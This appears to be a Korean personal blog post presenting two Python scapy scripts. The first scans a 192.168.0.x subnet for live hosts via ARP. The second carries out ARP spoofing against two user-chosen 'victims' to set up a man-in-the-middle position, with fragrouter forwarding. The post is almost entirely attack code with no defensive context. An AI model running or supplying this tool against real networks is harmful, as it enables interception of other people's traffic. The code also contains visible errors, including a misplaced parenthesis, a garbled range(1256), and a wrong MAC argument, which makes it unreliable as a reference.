본문 바로가기
Programming/Python

ARP Spoofing

by 비니화이팅 2020. 2. 24.

<scan.py>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from scapy.all import *
import threading
import os
 
host_list = {}
num = 0
threadLock = threading.Lock()
threads = []
 
def printHosts(host_list):
    print('-------------------------- HOST LIST --------------------------')
    print('NUM         IP                               MAC')
    print('---------------------------------------------------------------')
    for num in host_list:
        ip, mac = host_list[num]
        print("%d           %s                      %s" % (num, ip, mac))
    print('---------------------------------------------------------------')
 
def sendARP(ip):
    global host_list, num
    ans, unans = srp(Ether(dst='ff:ff:ff:ff:ff:ff'/ ARP(pdst=ip), timeout=5, retry=1)
    for s, r in ans:
        threadLock.acquire()
        num = num + 1
        host_list.update({num: (ip, r.sprintf('%Ether.src%'))})
        threadLock.release()
 
def scanHosts():
    for i in range(1256):
        ip = "192.168.0.%d" % i
        th = threading.Thread(target=sendARP, args=(ip,))
        th.start()
        threads.append(th)
 
    for t in threads:
        t.join()
 
    os.system('clear')
    printHosts(host_list)
    return host_list
cs


<arp_spoofing.py>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from scan import *
from scapy.all import *
import os
 
def arpSpoof(vic1_ip, vic1_mac, vic2_ip, vic2_mac):
    arp1=ARP(op=2, psrc=vic1_ip, pdst=vic2_ip, hwdst=vic2_mac)
    arp2=ARP(op=2, psrc=vic2_ip, pdst=vic1_ip, hwdst=vic2_mac)
    send(arp1)
    send(arp2)
 
def restoreARP(vic1_ip, vic1_mac, vic2_ip, vic2_mac):
    arp1=ARP(op=2, psrc=vic1_ip, hwsrc=vic1_mac, pdst=vic2_ip, hwdst='ff:ff:ff:ff:ff:ff')
    arp2=ARP(op=2, psrc=vic2_ip, hwsrc=vic2_mac, pdst=vic1_ip, hwdst='ff:ff:ff:ff:ff:ff')
    send(arp1, count=3)
    send(arp2, count=3)
 
def main():
    host_list=scanHosts()
    victim1=input("Victim 1 : ")
    victim2=input("Victim 2 : ")
 
    print("ARP Spoofing START")
 
    os.system("fragrouter -B1")
    try:
        while True:
            arpSpoof(host_list[int(victim1)][0], host_list[int(victim1)][1], host_list[int(victim2)][0], host_list[int(victim2)][1])
    except KeyboardInterrupt:
        restoreARP(host_list[int(victim1)][0], host_list[int(victim1)][1], host_list[int(victim2)][0], host_list[int(victim2)][1])
        print("ARP Spoofing END")
 
if __name__=='__main__':
    main()
 
cs


'Programming > Python' 카테고리의 다른 글

Dictionary Attack  (0) 2020.03.04
ARP를 이용한 host scan  (0) 2020.02.24
ARP Spoofing  (0) 2020.02.24
cookie를 이용한 로그인  (0) 2018.07.18
살아있는 호스트 IP 스캔하기  (0) 2018.02.13
1의 보수와 2의 보수  (2) 2017.01.20

댓글0